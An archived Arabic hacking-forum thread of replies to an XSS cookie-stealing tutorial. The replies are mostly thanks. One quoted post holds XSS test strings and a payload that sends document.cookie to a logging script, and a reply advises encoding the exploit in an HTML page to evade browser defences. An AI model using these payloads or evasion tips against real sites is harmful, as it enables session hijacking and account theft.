:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   حقن xss - ssi (http://www.vbspiders.com/vb/f427.html)
-   -   [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~ (http://www.vbspiders.com/vb/t58067.html)

Cyber Code 08-22-2011 01:34 PM

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
good job :)
keep up

bleu moon 08-22-2011 01:40 PM

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
اقتباس:

المشاركة الأصلية كتبت بواسطة Cyber Code (المشاركة 388412)
good job :)
keep up

:bleh:

ZrIqE ViRuS 08-22-2011 02:20 PM

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
يعطيك الف الف عافيه يا غالي.........


اقتباس:

المشاركة الأصلية كتبت بواسطة mass1993 (المشاركة 388280)
يعطيك العافية اخوي عالشرح ...ولكن عندي استفسار:

انا عندي سيرفر شخصي اباتشي اصدار 2.5.8 ووضعت ملف الثغرة فيه وكل اشي تمام...ولكن لما كتبت هذا الكود بالمتصفح:

كود:

'"--></style></script>***************("Www.VBspiders.com")</script>
وضغطت انتر ما طلعلي تنبيه في المتصفح وطبعلي التاليي:

كود:

\'\"
ولكن لما كتبت الامر هذا :

كود:

'"--></style></script>***************(4444444)</script>
وضغطت انتر طلع التنبيه وكل اشي تمام...

ولكن لما اجيت احط هذا الامر:

كود:

"><a href="#" onclick="********.location='http://localhost/log.php' +escape(********.******);"><Click Me></a></script>
ورحت لملف nor15din ما لقيت اشي فيه...اخوي شو هالمشكلة بالله عليك وليش صار هيك معي؟؟؟

تحياتي

اممممممممم
هاد السر بهاي الثغره والي محتكرها المحترفين ......!!
بتعرف شغله

انت لازم تضع الاستغلال بداخل صفحه
html
وتشفر الاستغلال
وبعد تشفر صفحه
html
;)
اعملك شويه بحث وصدقني رح تزبط معاك

السبب بانه ما زبط معاك هو المتصفحات الحديثه بتعمل شويه حمايه لها من هاي الثغره
لكن التشفير ما عليه حمايه ......



مشكور يا نوووووور كثير ع تعبك وشرحك
وفقت حبيبي

bleu moon 08-22-2011 02:21 PM

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
يعطيك العافيه حبيبي فولكانو

اجتياح الجراد 08-22-2011 03:42 PM

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
الشرح جميل جدا وممتاز على الي يعانو من هذه الثغرة

والله الاخ ما قصر في شرحها واصل حبيبي

bleu moon 08-22-2011 04:01 PM

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
اقتباس:

المشاركة الأصلية كتبت بواسطة اجتياح الجراد (المشاركة 388429)
الشرح جميل جدا وممتاز على الي يعانو من هذه الثغرة

والله الاخ ما قصر في شرحها واصل حبيبي

انا كمان كنت مابعرف كيف استغلها :nosweat:
بارك الله فيك منور الموضوع ..~

:2:

The Final Doom 08-22-2011 04:58 PM

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
تسـلم كثير حبيبي .,,
شرحك واضح + جميل !
cry
هههههه

bleu moon 08-22-2011 05:04 PM

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
اقتباس:

المشاركة الأصلية كتبت بواسطة Doom[Ps] (المشاركة 388436)
تسـلم كثير حبيبي .,,
شرحك واضح + جميل !
cry
هههههه

هلا حبيبي دووم كيف اخبارك ؟
بعرفها مليح بلا .. ~
ههه
الضاهر الكلمه عجبتك :sad_1:

cry

منور الموضوع

:sad_1:

double-zero 08-22-2011 07:54 PM

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
شرح جميل ومنسق .. يعطيك العافية يابطل واصـــــــل ^_^

bleu moon 08-22-2011 08:01 PM

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
اقتباس:

المشاركة الأصلية كتبت بواسطة double-zero (المشاركة 388481)
شرح جميل ومنسق .. يعطيك العافية يابطل واصـــــــل ^_^

بارك الله فيك :3:

aircrack -ng 08-22-2011 10:55 PM

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
باراك الله فيك نور موضوع قوي

bleu moon 08-22-2011 11:15 PM

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
اقتباس:

المشاركة الأصلية كتبت بواسطة Spartacus (المشاركة 388515)
باراك الله فيك نور موضوع قوي

هلا حبيبي نسيموا !
منور الموضوع زي مصباح 1000 وات


1000W

:shutup:

Jaguar.PS 08-27-2011 06:34 PM

رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~
 
شو هالحلاوة هاي ولك !

جو اون مان :)

bleu moon 08-27-2011 06:42 PM

رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~
 
اقتباس:

المشاركة الأصلية كتبت بواسطة Jaguar.PS (المشاركة 389440)
شو هالحلاوة هاي ولك !

جو اون مان :)

:sad_1:

thx

:2:

kasper-misr 08-28-2011 03:41 AM

رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~
 
بارك الله فبك بس انا عندي استفسار بسيط

هل يمكن ان نرفع ملف علي موفع معين ويكون هذا الملف مصاب بثغره xss
ونقوم نحن باستغلال هذا الملف ,ولا لازم يكون الموقع ذات نفسه يكون مصاب بثغره xss
علشان نسرف الكوكيز

وهل سرقه الكوكيز للاعضاء المسجلين في الموقع ققط ولا لكل من يدخل علي الموقع من الزوار

انا اسف اطلت عليك ولكن اردت ان تكتمل الصوره في مخيلتي


الساعة الآن 01:48 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0